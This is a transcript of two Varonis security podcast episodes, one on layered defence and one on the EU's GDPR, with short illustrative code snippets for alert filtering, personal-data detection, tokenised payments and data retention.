Kilian: The way I would think about it, too, is if you've ever seen the machines for panning for gold or sifting rocks, you have different sizes of screens.
Endpoint protection and antivirus, I would think, are like the biggest size of screen. They're going to get the bigger rocks out, the most obvious, most basic vulnerabilities. And as you go through, each layer sifts out different things that another might not catch.
And then just good patch management, too, on endpoints and servers, things like that. If you leave vulnerabilities that have been patched for 10 years on your system, that’s kind of inviting trouble in a lot of ways. But then people often overlook it.
Mike: Those are the big holes in your screens: as you're trying to sift through all the data, everything is falling through these unpatched systems.
Cindy: But there are a whole bunch of alerts. People get thousands of them, like daily and weekly. That’s another annoyance. You can’t actually check thousands of alerts every day.
Mike: And for all these sorts of systems that monitor things, all the vendors, us included, are trying to address what people call alert fatigue. If you get an alert every 10 minutes, like, "Oh, something's happening, something's happening," you just cease to care about it. It's not treated as something that actually needs to be responded to or thought about. So there's a lot of work with machine learning, better filtering, and better tracking on how to handle that and reduce alert fatigue. But you're absolutely right, Cindy.
Cindy: And also make alerts that are really worth alerting on so that you’re not like, “Oh my God, my blood pressure is increasing,” and then you end up in the hospital or something.
Mike: What kinds of alerts are you getting?
Cindy: No, listen, it’s not me. I’m just hearing all these stories when I go to conferences and I go, “If I had that many alerts, I will just be like…ahhhhh! Watch out for the crazy woman.”
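As a toy illustration of the "better filtering" idea mentioned above, here is a minimal Python sketch of alert suppression; the alert names, the suppression window, and the dedup-by-key approach are hypothetical simplifications of what real monitoring tools do.

import time
from collections import defaultdict

SUPPRESS_SECONDS = 600          # hypothetical: at most one page per key per 10 minutes
last_sent = defaultdict(float)  # alert key -> last time we actually paged someone

def should_page(alert_key, now=None):
    # Suppress repeats of the same alert inside the window; let new or
    # long-quiet alerts through so real incidents still page someone.
    now = now if now is not None else time.time()
    if now - last_sent[alert_key] >= SUPPRESS_SECONDS:
        last_sent[alert_key] = now
        return True
    return False

# Hypothetical stream of raw alerts: 100 repeats collapse to a single page.
for _ in range(100):
    if should_page("disk-full:fileserver01"):
        print("PAGE: disk-full:fileserver01")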
So another layer we should talk about is network security. I'm thinking firewalls, intrusion prevention and detection systems, VPNs. And I was kind of tricked into reading an article titled "Utility board hears about network security." I was like, "Oh, they're really serious about network security. What about the other stuff?"
So I clicked on it and read it, and they do take security seriously. In the article, the IT director talked about network security. He made references to all the different layers that we've been talking about so far, and he made the analogy of Swiss cheese as security: you put layers upon layers of it, and even then, with all the layers of cheese, a small hole in your security can be catastrophic.
And I thought it was really great that they're talking about it. Further on, the article mentioned that a board member had requested the presentation because he had heard at a utilities conference about the hacking of an electrical system in Colorado.
So we hear a lot about things that go wrong at companies that aren't doing anything about it, but I really liked that they're saying, "Hey, I'm protecting our utility's network." And it's a great way to get more security funding, too, because security systems are expensive, whether it's network gear or anything else. Even if it's a $200 thing, you still have to explain why you need it. So back to network security, a presentation like the one they gave is a great way to justify the money. There's a section in Rob's layered security guide about what the difference is between a $1,000 one and a $200 one.
Mike: For a firewall, you’re talking about?
Cindy: For a fire…yeah. I went on a tangent. I think someone…
Kilian: I mean, you brought up an interesting point. That article, I thought, was really kind of fascinating, because if I can pick one security thing that scares me on a daily basis, it's a lot of these, not command and control exactly, but the SCADA systems or the industrial control systems that run a lot of our infrastructure.
And back to the unpatched systems: these things are from the, whatever, '80s, '90s, and somebody said, "Oh, hey, we can monitor our dam controls online, stick it on a network with an IP address," and then it controls a vital piece of infrastructure, something in the physical world that can cause a lot of damage. Or the controls of the electrical system, where you can wipe out power and cause a lot of problems in the physical world.
Network security is, again, one of the critical layers. If you have to connect something like that to a network, at least run it through something. You still need defense in depth across the whole board, but that's kind of the first line of defense for network-connected systems.
Mike: The only other thing I was going to mention is that I think a lot of times, people think of network security, especially with a lot of remote employees, as, "We need VPNs for everyone. We have VPNs for everyone. We'll be protected." But you have to remember that it's also sort of like punching a hole in your firewall, because a VPN makes a home computer act as if it were on your network, with all the ensuing issues that can cause.
Kilian: And then we can tie it right back to physical security. You're on your VPN at Starbucks, you walk away for a few minutes without locking your laptop, someone walks up and plugs something in, and then the internal network's compromised.
Mike: I know for sure there have been multiple reports of people getting ransomware on their networks from, like, someone at home getting an infection and bringing it to the IT group.
Like, “Oh, Bill in IT, he’ll help me out. He’s always such a nice guy.”
They bring it in.
Like, “You look at this real quick? It’s real weird.”
“All right, let’s plug it in the network.”
And, boom, the network is now infected with ransomware. Good intentions gone awry.
Cindy: Oh my God, I’m so scared that whenever you guys just share stories and I get like extra, extra scared.
Okay, the next layer is application security, and there's a lot to talk about in that one. I wrote a blog post about how our IT people won't let me install anything on my computer. When we talk about application security, it refers to the testing and the work to make sure apps work as they should. But there are some drawbacks to that, which is why IT won't let me install anything; I have to get permission and tell them why. And I understand, it's a dangerous world out there.
What are some things about application security that we need to be worried about or concerned about?
Mike: Most companies have a mix of things. They have applications they built in-house, third-party systems that they bought as commercial off-the-shelf, or COTS, software, and now cloud systems. We joke that the cloud doesn't exist, it's just other people's computers: our software running on other people's computers, or software-as-a-service type applications. There are different considerations for each of those.
I think, across the board, one of the things to really think about for all of this is single sign-on. The procedures for provisioning access to these systems, and then removing it as people's roles change or as they come into or leave the company, are incredibly important.
And if there is one place where that's most often missed, it's in those kinds of things where...I used to work at a company. I won't say the name of it.
But their phone system was separate from everything else, so a salesperson who left had all their computer access removed but kept their phone access. And they changed their outgoing voicemail, which, for months, was just a harangue against the company: what blood-sucking horrible people they were, how unprofessional and incompetent. And it stayed that way for months as people called in to talk to this salesperson they knew over there.
But that can happen anywhere, with timesheets software, that can happen with reporting software, the project management software.
All of these things can exist somewhere on the spectrum. And without that single sign-on and really strict procedures, it’s very difficult to control.
Kilian: Just a little bit of an aside, too: as we develop more software and it gets more complex and we expect more out of it, that just increases the chance that there's going to be a bug. It's a guarantee that every piece of software you run is going to have some type of issue or bug in it.
Again, especially as the systems get more complex and more interconnected. So it's being cognizant of that, and, to go back to a couple of topics ago, good patch management: making sure that bugs are reported, and that the software vendors you deal with take them seriously and patch them soon rather than eventually.
Cindy: And the next layer is the data layer, which we talk about a lot. I think it's the crown jewels. We want to make sure that our health data isn't stolen, our PCI data isn't stolen. You hear it often in every kind of podcast or show: you kind of expect data breaches to happen, and people are really hurt that that's happening. "Oh, they're not doing enough." But the reality is, data security is tough. What are your thoughts about this layer?
Mike: At Varonis, we deal with structured data. Structured data, for the most part, falls under application security: it's anything that's in a database, and typically the access is mediated, arranged, and managed through an application. You just want to make sure there isn't direct database access somehow through the network via exploit tools. But for the most part, that's fairly sane.
Our niche is the unstructured world, which is files, and typically what we see there is the end result of all the structured data. So the structured data is the giant Oracle database that says, "Yes, we should actually acquire this company," and the unstructured data is the PowerPoint that says, "We'll do this next Monday." And if that gets out, it has huge implications for stock price, and Sarbanes-Oxley, and reporting, and governance, and all these things. So there are different risks involved with those.
Kilian: The thing about unstructured data is that there's so much of it and it grows constantly. Every second of every day, at every business, somebody is putting some type of information out: sending an email, writing a document, editing a PowerPoint, any of this stuff. It's constant, and that's how businesses evolve and get better, because they share information. They just keep producing and producing it, and it never seems to go anywhere. The internet never forgets; well, your data center never forgets either. The project might be forgotten, but it's still out there somewhere on the SharePoint site. All the team collaboration is over, but it's still up there and contains a lot of information. There's a life cycle to that information.
But things like social security numbers, those never change. There might be an age on credit card information, but it's still fairly long, several years, depending on how long it's out there. The life cycle of this data is often overlooked, and you expose yourself to a lot of risk because of it. Again, it's created for some legitimate reason and it's out there for some legitimate reason, but it's forgotten about, or it's not dealt with or disposed of or even secured properly.
Cindy: So to kind of wrap up, you both shared stories that I’m just like, “Oh, it’s nerve-racking,” but the overall goal is security. So we make sure we educate the people. We make sure that they don’t have access to stuff that they don’t need. We make sure they don’t get in. We make sure we protect ourselves from malware, make sure we protect our data, make sure that apps are working properly. What are some kind of wrap-up conclusions or things that I’ve missed that you want to share your thoughts on?
Mike: I think we should go back to your Swiss cheese sandwich metaphor, because honestly, I think it’s actually viable. The big challenge with all of this is communicating it to people who are not in our business, communicating it to the executives and to the users that we need to deal with. And so we say exactly that: it’s like stacking a lot of pieces of Swiss cheese, and the more layers we have, the fewer holes there are, and the less vulnerable we are. It’s a very easy-to-understand metaphor. Hopefully, they’re not lactose intolerant. But I think that really is the case: the more layers we have, and the more all these things work together, the safer we are. That’s a really powerful thing.
Cindy: Kilian, do you have any last thoughts?
Kilian: No, I like the metaphor. I think it’s great. I have other metaphors I use for thinking about security, but the Swiss cheese one, I think, is very visually pleasing. I guess it’s something people can recognize.
Cindy: That metaphor is from the IT director in Nebraska. Maybe he’ll listen to our podcast or join our show.
Mike: I thought we decided we’re just going to start sending packets of sliced Swiss cheese to all our customers… “Stack this together until you’re secured.”
Cindy: Make sure the bad guys don’t get in.
Cindy: So to wrap up with our parting gifts: what are some things people should check out? For me, I’m pivoting to something else. On our show last week, we talked about the EU’s General Data Protection Regulation, and we just published an infographic about it on our blog. So if you don’t want to read long text, Andy and I created a really informative infographic describing consumer rights, as well as the obligations companies have to consumers. Head over to our blog and check it out.
Mike, do you have any parting gifts for our listeners and viewers?
Mike: I was going to recommend something else, but first I’ll say that I just looked at the infographic you’re talking about. It’s at blog.varonis.com, and I think it really is great. Since we’re talking about educating other people, it’s the perfect thing, if you’re in IT, to send to an executive or some other stakeholder in your company to help get their minds in the right place for dealing with the new regulations.
My suggestion for a parting gift was going to be a game, actually.
It’s called Hacknet. It’s probably one of the few games you could get expensed by your company. It looks so much like the movies, when they’re hacking into a system and everything is scrolling and doing stuff. It’s a simulation of that, but it covers actual exploits, the concepts of how they’re exploited, and what’s done. So it’s very educational but super fun to run through; it has a little scenario and you actually hack into all these different systems.
It’s called Hacknet, and right now it’s $10. But as I mentioned last week, during this summer sale I think it’s going to be $5. It’s very cool and interesting. And if you’re interested in this as a general topic, and I know we have a lot of people on the IT side and not necessarily the security or pentesting side, it’s a great way to really deeply understand all those concepts. So, cool, check it out.
Cindy: Cool, thanks. Kilian, do you have a parting gift?
Kilian: Actually, what Mike was saying just reminded me of something. The other week, I was in an Uber, taking a ride to the airport or the train station or somewhere, and on the screen they popped up a little thing like, “Hey, code while you go,” or something like that. They gave you little snippets of code and wanted you to find the error in the code. I thought it was really interesting, a kind of crowdsourcing, maybe even a lead-in to a potential job offer. I just thought it was interesting that they were doing this little application-security-type initiative within the app itself, while you’re on the trip. I don’t know if those pop-ups are for everybody, but I saw it and thought it was interesting to look at while I was on my ride.
Mike: Are you saying you got a job offer from Uber? You’re leaving Varonis? You figured it out?
Kilian: The next time you’ll see me with my dash cam and my car driving around.
Mike: Oh, man…
Cindy: Kilian might be doing both. He might be driving and working at Varonis. You never know because you know he’s fake.
Thanks so much, Mike and Kilian, and all our listeners and viewers for joining us today.
If you want to follow us on Twitter and see what we’re doing or tell us who’s most fake on the show, you can find us @varonis, V-A-R-O-N-I-S.
And if you want to subscribe to this podcast, you can go to iTunes and search for The Inside Out Security Show.
There is a video version of this on YouTube that you can subscribe to on the Varonis channel. So thanks, and we’ll see you again next week.
Mike: Thanks, Cindy.
Kilian: Thanks, Cindy.
Cindy: Thanks, Mike. Thanks, Kilian.
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post Layered Security – IOSS 14 appeared first on Varonis Blog.
We’ve been writing about the GDPR for the past few months now and with the GDPR recently passed into law, we thought it was worth bringing together a panel to discuss its implications.
In this episode of the Inside Out Security Show, we discuss how the GDPR will impact businesses, Brexit, first steps you should take in order to protect EU consumer data and much more.
Go from beginning to end, or feel free to bounce around.
Cindy: Hi and welcome to another edition of the Inside Out Security show. I’m Cindy Ng, a writer for Varonis’s Inside Out Security blog. And as always, I’m joined by security experts Mike Buckbee, Rob Sobers, and Kilian Englert. Hey, Kilian.
Kilian: Hi Cindy.
Cindy: Hey Rob.
Rob: Hey Cindy, how is it going?
Cindy: Good. And hey, Mike.
Mike: Hey Cindy, you made me go last this week. That’s all right.
Cindy: This week, we also have two special guests, also security experts: Andy Green, who is based in New York, and Dietrich Benjies, who is based in the UK. They’re here to share their insights on the General Data Protection Regulation, which was just passed with the aim of protecting consumer data and which will impact businesses not only in the EU, but also in Britain, the US, and the rest of the world. So hi, Andy.
Andy: Hey Cindy.
Cindy: Hey Dietrich.
Dietrich: Hi Cindy.
Cindy: So, let’s start with the facts. First, what is GDPR and what are its goals?
Andy: In one sentence? Can I get two?
Cindy: You get two and a half.
Andy: Okay, two and a half.
So it stands for General Data Protection Regulation. It’s the successor to the EU’s current data security directive, which is called the Data Protection Directive, or DPD. And really, if you are under those rules now, the GDPR will not be a major change, but it does add a few key additions. One of those is stronger rules on, let’s say, the right to access your data. You really have almost like a bill of rights.
One of them is that you can see your data, which is maybe not something we’re used to in the US.
Also, another new thing is the right to data portability, which is something that Facebook probably hates. In other words, you can download your [personal] data. I assume this means that in the UK or the EU, if you are a Facebook customer, you will be able to download everything Facebook has on you in some sort of portable format.
And I guess that [if you have another] social media service, you could then upload that data to it and say goodbye to Facebook, which is not something they’re very happy about.
… You have almost like a set of consumer data rights under the new rule. I don’t know if anyone has any comments on some of these things, but that, I think, is a big deal.
Dietrich: I’m sorry Mike. Were you going to go next? I chimed in so I suppose I’ll carry on-
Cindy: Go ahead, Dietrich.
Dietrich: So I think, in terms of the intent, it’s the European Union recognizing that European citizens see their data as important, and that, both recently and historically, there have been many cases where it hasn’t been appropriately controlled.
And because the information on them is a commodity, traded on the open market to a degree, there has been increasing demand for greater safeguards on their data. And those greater safeguards on European citizens’ data give them greater confidence in the market, in the electronic market that the world economy has become.
So the two pillars, or the two tenets, which we’ll get to, are Privacy by Design and accountability by design … we’ll get to a lot of things, but that’s the synopsis of it.
Mike: I was curious to what extent this is targeting enterprises versus targeting, say, like you brought up, Facebook, which I consider an application, a web application service. Was there an intent behind this, that it’s targeting one more than the other?
Andy: Yeah. It’s definitely, I would say consumers. I mean it’s really very consumer-oriented.
Dietrich: Mike, do you mean in terms of its targeting consumers? Yes, it’s consumer data it relates to. Or do you mean in terms of the types of businesses where it’s most applicable? Is that what you mean, Mike?
Mike: Well, you know, there’s a decision-making framework. Now, with the GDPR replacing the Data Protection Directive, I need to make decisions: if I’m building an application, am I going to need new privacy features? We talked about Privacy by Design, which has its own sort of tenets. Or I’m building out the policies for my company, which has satellite offices all over the world, and some of them happen to be in the EU. I’m just trying to look at the impact and at how this should change my decision-making for the business.
Dietrich: Well, to be cynical, I’d say if you want to avoid it totally and entirely, just don’t sell to EU citizens.
Rob: Yeah, I think, to answer your question, Mike, the Facebooks of the world and these global web services are going to have to worry about it if they are collecting data. And we all know Facebook not only collects the data that you give them but it also ascertains data through your actions.
And I think that’s what Andy was talking about is that it’s not just the ability to click a button and say give me my profile data back now so I can take it with me. It’s like I put that data in but I think what the GDPR is aiming to do is give you back the data that they’ve gathered on you from other sources. So tell me everything you know about me because I want to know what you know about me. And that’s, I think, a very important thing. And I really hope that the US goes in that direction.
But outside of those web services, think about like any bank that serves an EU customer. So any bank, any healthcare organization, so other businesses outside of these big global web services certainly do have to worry about it, especially if you look in your customer database or any kind of…if you are a retailer, your transaction database, and you have information that belongs to EU citizens then this is something that you should at least be thinking through.
Cindy: So who needs to really pay close attention to the law so that you are executing all the requirements properly?
Dietrich: Who needs to pay attention to it in terms of the organizations in scope? It’s pretty well spelled out: the organizations that deal with, transfer, or process (there’s a big emphasis on processing) information associated with European citizens.
So if I backtrack a bit: we started with the portability of the data, the information organizations hold on individuals, and the subject access requests and the right to erasure. But first and foremost is the protection element: making sure the data is protected, that organizations aren’t putting us at risk by holding our data and leaving it overexposed.
Kilian: To address the question a little more technically, I think everybody involved in the process needs to pay attention to it. From the people designing the app, Mike, if you want to launch your business, you need to realize that with today’s technology, boundaries don’t really exist anymore.
So, right from the beginning, and we’ll talk about Privacy by Design, that needs to be the first step, all the way up to the CEO of the company or the board realizing that this is a global marketplace. If they want the largest number of customers, they have to take it seriously.
Andy: Yeah, I was going to say that they do have a heart at the EU … and they do make an exception … there is some language making exceptions for smaller businesses, or businesses that are not collecting data on, as they say, a really large scale, whatever that means!
What you are saying is all true, but I think they do say that they will scale some of the interpretations for smaller businesses so the enforcement is not as rough. And there may even be an exclusion, I forget, for companies under 250 employees.
But I think you are right. Especially with the fines, this is really meant to get the attention of C-level and higher executives.
Cindy: So if you are a higher-up, or someone responsible for implementing the GDPR, what’s the first step you need to take so you don’t miss any deadlines and so you’re planning ahead?
Andy: I actually talked about this with Dietrich the other day. Some of this is really, I’d say, common IT sense: if you are following any kind of IT best practices, and there are a bunch of them, or some standards, you are probably 60 or 70% of the way there, I think.
I mean, let’s say you are handling credit card transactions and dealing with PCI DSS, or you are following something like the SANS Top 20 … So maybe I’d say it’s sort of like putting laws around some common-sense ideas. But I realize the executives don’t see it that way.
Kilian: Yeah. I think the first thing you have to do is figure out if you have that data to begin with, and where it is. I mean, the common knowledge is you probably do. If you do any type of commerce or interact with anybody, really, you are going to store some information. But nailing down where it is, or where it might be, is, I think, the key first step.
Dietrich: And in terms of deadlines, to answer your question very directly, the deadline is May 25th, 2018; that’s when it comes into full force. I wouldn’t say it’s fast approaching. We still have 23 months.
…
Dietrich: I’ve got a clock on my laptop right there. Deadline to GDPR.
Cindy: So there is also a data breach notification requirement. What does that process entail? How do you get fined, and how do you know that personal data has been lost or breached? And what’s defined as personal data? Because there is a difference between leaking, say, company IP versus leaking personal data.
Andy: Actually I happen to have the definition right in front of me. So it’s any information related to a person. And in particular, it can be…so it says an “identifiable person is one who can be identified directly or indirectly in particular by reference to an identifier such as a name, an identification number, location data, or an online identifier”.
So it’s really, I guess what we would call in the US, PII [personally identifiable information], but it’s broad. It’s not just a strict list of social security number or specific account numbers. Those are examples of the types of identifiers. So it’s very broad but it has to relate back to a person and they do consider the online identifiers as “relatable to a person”.
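As a toy illustration of the identifier idea Andy quotes, the sketch below scans a piece of text for a few obvious patterns (email addresses, US SSN-style numbers, phone-like numbers). The GDPR’s definition of personal data is far broader than any regex list; these patterns and the sample text are examples only, not a discovery tool.

```python
import re

# Example-only patterns; real personal-data discovery needs far more than regexes.
PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "ssn_like": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "phone_like": re.compile(r"\+?\d[\d\s().-]{8,}\d"),
}

def find_identifiers(text: str) -> dict:
    """Return which example identifier patterns appear in a piece of text."""
    return {label: rx.findall(text) for label, rx in PATTERNS.items() if rx.search(text)}

sample = "Contact Jane at jane.doe@example.com or +44 20 7946 0958."
print(find_identifiers(sample))
```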
Cindy: And I can’t help but ask, Dietrich, will Brexiters be exempt from the GDPR?
Dietrich: No. Not at all.
So, first off, yes: a week ago today, we cast our votes, and a week ago tomorrow we found out that, in fact, we are leaving the European Union. But the reality is that we haven’t invoked Article 50. Article 50 is the formal step that says yes, we are definitely doing it; once we invoke it, we then have 24 months to get the heck out of the European Union.
The starting of that clock isn’t likely to happen for some time. For one, David Cameron, who is currently our prime minister, is stepping down… has stepped down. We have to wait. He said, “I’m not going to invoke it. I’m going to let somebody else handle not only the process of invoking Article 50, but also negotiating the trade policies and all the things associated with the exit.”
Among all the things associated with the exit is the adoption or exclusion of a lot of the European directives, the GDPR being one. And that timescale only comes into play if Article 50 is invoked. There are also some questions about the legality of the referendum, which I won’t go into in detail, but there is a lot of debate at the moment about whether the Leave vote is actually something that will happen.
If it happens, and let’s say it will, the timescale of that activity is likely to run well past the point where the GDPR is in effect. And even if we do leave, which is the likelihood, since in the democratic country in which we live we have cast a vote to leave, we could still take on the GDPR as our own.
We have our own Data Protection Act here in the UK. We could just bring it up to the level of the GDPR with the stroke of a pen. And that’s quite likely, considering we will be negotiating for, hopefully, as free a trade arrangement as we can get with the European Union, and it would make sense for that to be a dependent clause.
Andy: And I was going to say, it looks like if you’re…since the UK has to trade with the EU, the EU countries are going to put in higher standards for e-commerce transactions.
Dietrich: Yeah. They are our biggest trading partner. I believe, and don’t quote me on this, I could be wrong, but I think 54% of our exports go to the EU. And likewise, we are one of the biggest trading partners for France, for Germany, etc.
Cindy: So, the US, we trade with the EU and the…
Dietrich: Do you? (sarcasm)
Cindy: I’m really talking about territorial scope. And I’m curious if I start a business or Mike starts a business, we talked about this earlier, how will I…what’s the law in terms of me needing to protect an EU consumer’s personal data? That’s a little controversial. Go ahead Dietrich.
Dietrich: Can I give you some examples on this?
In the last 48 hours, I have purchased flights from Southwest Airlines and United Airlines, and I’m a European citizen. I have purchased a backpack from some random site that’s being shipped to my father.
Look, I hope I’m not landing myself in tax trouble, but anyway, you know what I mean. As a European citizen, I’m going to be in the States for three weeks as of next week. So I’m a European citizen who is going to be transacting, who is going to be purchasing stuff over there. Considering the freedom of movement that exists, the small world in which we live where European citizens regularly travel to the US and regularly buy from sites online, I can’t see how the border is going to make any difference.
Most, I’d say the vast majority, of organizations in the US will deal with European citizens, and therefore, at least for that subset of data related to European citizens, they’ll have to put controls in place if they want to carry on trading with them.
Cindy: Go ahead, Mike.
Mike: Well, I was trying to think of parallels to this, and there is one that I think a lot of people are aware of, which is the Cookie Law. There were some European directives saying that if you land on a website, you should see one of those banners at the bottom that says this website uses cookies, click to accept, and that came out of a similar thing. It’s really only been European websites doing that, but it’s sort of a half step into this. I just wonder if that shows a model for how this is going to be adopted, so that it’s only the strictly EU sites.
Andy: Yeah. I think that was, that came out of, I forget, it may have been the Data Protection Directive but you’ve got to gain consent from the consumer and they apply it to cookies, accepting cookies. So you do see that on a lot of the EU sites, that’s right.
Mike: It just seems very odd because there is no…it doesn’t seem like it will improve things. It just seems like, yeah, we are getting cookies off you so here is this giant banner that gets in the way.
Andy: Will they ever click no?
Mike: Well, what’s interesting is that I don’t think I’ve ever actually seen, “Yeah, no, don’t collect my cookies.” It just says, “Hey, we are doing this, so accept it or leave. You are on my website now,” probably said with a French accent.
Cindy: So in terms of, we talked about the cookie law, we’re talking about the GDPR.
If you are a CEO and you know that there is a potential risk of anything, really, let’s say a data breach, then when something happens, people are often asking, “Okay, higher-ups, can we work through this? Will our company survive?”
It sounds like people don’t like to be strong-armed into following certain laws. If I’m an entrepreneur, I’m going to come up with an idea, and the last thing I want is, oh, I have to follow Privacy by Design. It’s annoying.
Rob: Yeah. I mean it’s a push and pull between innovation and security. You see this with all sorts of things. You know, Snapchat is famous for its explosive growth, hundreds of millions of active users a day. And in the beginning, they didn’t pay attention to security and privacy. They kind of consciously put that on the back burner because they knew it would slow their growth.
And it wouldn’t have mattered as much if they never became a giant company like they are today. But then it came back to bite them, like they’ve had multiple situations where they’ve had data breaches that they’ve had to deal with and I’m sure devote a lot of resources to recovering from, not only on the technical side of things but also on the legal and PR side. So it is a push and pull but we see it in varying degrees everywhere.
Look at what Uber is doing as they expand into different markets and have to deal with all of the individual regulations in each state and each country they expand to. They would love to just turn a blind eye and focus on improving their technology, recruiting new drivers, and making their business a success.
But the fact of the matter is, and the EU is way out in front of everybody else on this, that somebody has to look out for the customers. Because we just see it over and over again in the US: these massive breaches where people’s healthcare information is exposed on the public web, or their credit card numbers get leaked, or God knows what kind of information. And it just never feels like there are enough teeth to make organizations really assess their situation.
Every time I apply for a mortgage in the US (and I don’t do this very often, thank God!), the process scares me. You have to email sensitive information to your mortgage broker in plain text. They are asking for PDFs, scans of your bank account. And where that information goes… you’re just not that confident that a lot of these companies are actually looking after the information, putting it in secure repositories, and monitoring who has access to it. Without regulations like the GDPR, it would be way worse and there would be no one looking after us.
Kilian: You actually beat me to the point I was going to make there, Rob, by a couple of sentences. But, you know, fine: businesses don’t like being strong-armed, but consumers don’t like having their entire lives aired out on the Internet.
And I think you are 100% right there. It is a pain in the butt in some cases for innovation, but we keep coming back to it, or I will: Privacy by Design. You don’t have to make an either/or decision. If you start with that mindset to begin with, you can achieve both things. You can still achieve massive growth and avoid some of the problems, instead of trying to patch up the holes later on.
Dietrich: One thing in terms of the strong-arming, in terms of the regulatory fatigue that organizations get: I have been dealing with organizations for some time, and it often seems that regulations are the only things from the external world that actually make organizations focus.
And this is important. It’s important for us. I mean, I don’t just kind of like it, I quite like the intent of the regulation. It’s there to protect me. It’s not something esoteric; it’s quite explicitly there to protect our information. And if it requires a regulation for organizations to take heed and pay note, and to realize that even if they have been ignoring data breaches in the past, doing so in the future may cost them more than it has, then that’s probably a good thing.
Andy: I was just going to say that one word they use a lot in the law, and it has to do with Privacy by Design, is just “minimize.” I think you have to show that you’re aware of what you are collecting, minimize what you collect, and put a time limit on the personal data that you do collect. In other words, if you’ve collected it and processed it and you no longer have a need for it, then get rid of it.
It seems like common sense, and I think they want companies to be thinking along these lines of, as I say, just minimize. And that shouldn’t be too much of a burden, I think. I don’t know. As Rob was saying, some of these web companies are just going crazy collecting everything, and it comes back to bite them in the end.
Mike: And this is me being cynical but I wonder if this is going to be a new attack vector. If there is like an easy way to get all your information out of Facebook, then that’s the attack vector and you just steal everyone’s information through the export feature.
I don’t know if anyone else saw it, but there was a thing where you could hijack someone’s Facebook account by sending in a faxed version of your passport. That was a means by which they would reset your password if you couldn’t do anything else and you had lost access to it. They were like, “Well, this whole rigamarole, but fax in your passport,” and so people were doing that. I think it’s good intentions. I just wonder about the actual implementation, like how much of a difference it will actually make.
Rob: Yeah, and I think you are right, Mike, that the execution is everything with these regulations. We see it with PCI audits and PCI auditors that are just checking boxes. In a previous job, I worked for a software company that did retail software and was heavily dependent on collecting credit card information from devices and terminals and card swipes and all sorts of things, and we went through a PCI audit knowing that there were holes the auditors never found. It’s all about the execution. It’s all about following through on best practices for data security. The regulation itself isn’t going to make you excellent at security.
Cindy: So if I’m trying to catch up… if I am not following PCI, or if I am not following the SANS Top 20, which has now been renamed the Critical Security Controls… what are some of the things I can start with in terms of protecting my customers’ data? Any tips?
Rob: Well, I mean, one thing, and Andy kind of touched on this, is don’t collect it if you don’t have to. I think that’s the number one thing. Certain services out there actually make it easy for you not to touch your customers’ data. For instance, Stripe, which is a pretty popular payment provider now: if you are collecting payment information on the web from customers, you should never know their credit card number. It should never hit your servers. If you’re using something like Stripe, it basically goes from the web form off to Stripe, and you get at most the last four digits and maybe the expiration date. But as a business, you never have to worry about that part of their profile, that sensitive data.
So to me, start with asking that question of what do we actually have to have. And if we don’t need it, get rid of it and let’s look at all of our data collection processes, whether it’s by paper form or web form or API, whatever the method is and decide what can we ax to just cut out the fat. Like we don’t want to have to hold your information if we don’t have to. Now, failing that, I know a lot of companies cannot do that, like Facebook’s business is knowing everything about everybody and the connections. And so in that situation, it’s a little bit different.
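To make the pattern Rob describes a bit more concrete, here is a minimal sketch of a token-based charge using Stripe’s legacy Charges API: the browser (via Stripe.js) turns the card details into a token, the server only forwards that token, and the raw card number never touches your systems. The key, amount, and description below are placeholders, and newer Stripe integrations use PaymentIntents, so treat this as the pattern rather than a drop-in implementation.

```python
import stripe

stripe.api_key = "sk_test_your_secret_key"   # placeholder secret key, kept server-side

def charge_order(token_from_browser: str, amount_cents: int) -> str:
    """Charge a card using a client-side token; the raw card number never reaches us."""
    charge = stripe.Charge.create(
        amount=amount_cents,           # e.g. 2000 == $20.00
        currency="usd",
        source=token_from_browser,     # e.g. "tok_visa" in Stripe's test mode
        description="Order #1234",     # placeholder
    )
    # Persist only non-sensitive fields (the charge ID, and if needed the last
    # four digits the provider exposes) for receipts and support lookups.
    return charge.id
```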
Cindy: It’s hard, because what if I’m a company and I’m a hoarder? I live in New York, my studio is tiny, but what if I like to hoard?
It’s kind of like digitally hoarding stuff. And storage is cheap, so why not get more? What would you say to a digital hoarder who thinks, “I might need this information later”?
Rob: I would say stop. Stop doing that! There are data retention policies you can implement that prevent you from doing that. It’s an organizational culture thing, I think. Some organizations are great at data retention; others are hoarders. It’s just bad data protection.
Dietrich: Data retention and hoarders. We’d love to retain data; most of the organizations we talk to love to retain data. It’s nice having something that acts as the stick, sitting there saying: just get rid of it. I talk to organizations now and I think, finally, this is being implemented in such a way that we can actually go back to the business. Who doesn’t want the data deleted? It’s usually people in the business who say, “I may, at some time in the future, need that document I created 15 years ago.” Well, not if it has anything related to an individual associated with it.
In that case, you can only keep it for as long as there is a demonstrable requirement to have it. So I think it’s something, at that level, that should be welcomed by organizations, unless they are really… I mean, my wife’s a bit of a hoarder. If she were running a business, she would definitely have many petabytes of information. But for data related to individuals, it would give me the excuse to throw it out when she isn’t looking.
Andy: Right. I was going to add that the GDPR says, yes, you can collect the data and keep it, but I think there is language somewhere that says you have to put a time limit on it. You have to say, “This is the data I have,” and whether it’s five years or ten years, put some reasonable time limit on that data and then follow through. So sure, collect it, but make sure it has a shelf life.
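A minimal sketch of the shelf-life idea Andy describes, with made-up field names: tag each personal-data record with when it was collected and how long there is a declared reason to keep it, then purge anything past its limit. The five-year figure is only an example, not a GDPR requirement.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional

@dataclass
class PersonalRecord:
    subject: str                 # hypothetical identifier for the data subject
    collected_at: datetime
    retention_days: int          # declared shelf life for the purpose it was collected

def purge_expired(records: List[PersonalRecord],
                  now: Optional[datetime] = None) -> List[PersonalRecord]:
    """Keep only records still within their declared retention period."""
    now = now or datetime.utcnow()
    return [r for r in records
            if r.collected_at + timedelta(days=r.retention_days) > now]

now = datetime.utcnow()
records = [
    PersonalRecord("customer-001", now - timedelta(days=10 * 365), retention_days=5 * 365),
    PersonalRecord("customer-002", now - timedelta(days=1 * 365), retention_days=5 * 365),
]
print([r.subject for r in purge_expired(records, now)])  # ['customer-002']
```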
Cindy: Any final thoughts before we wrap up? Silence, I love it.
Mike: I was on mute, so I was talking extremely loudly while no one heard me. I was going to say my final thought is that we started this with Andy saying a lot of this is common-sense IT.
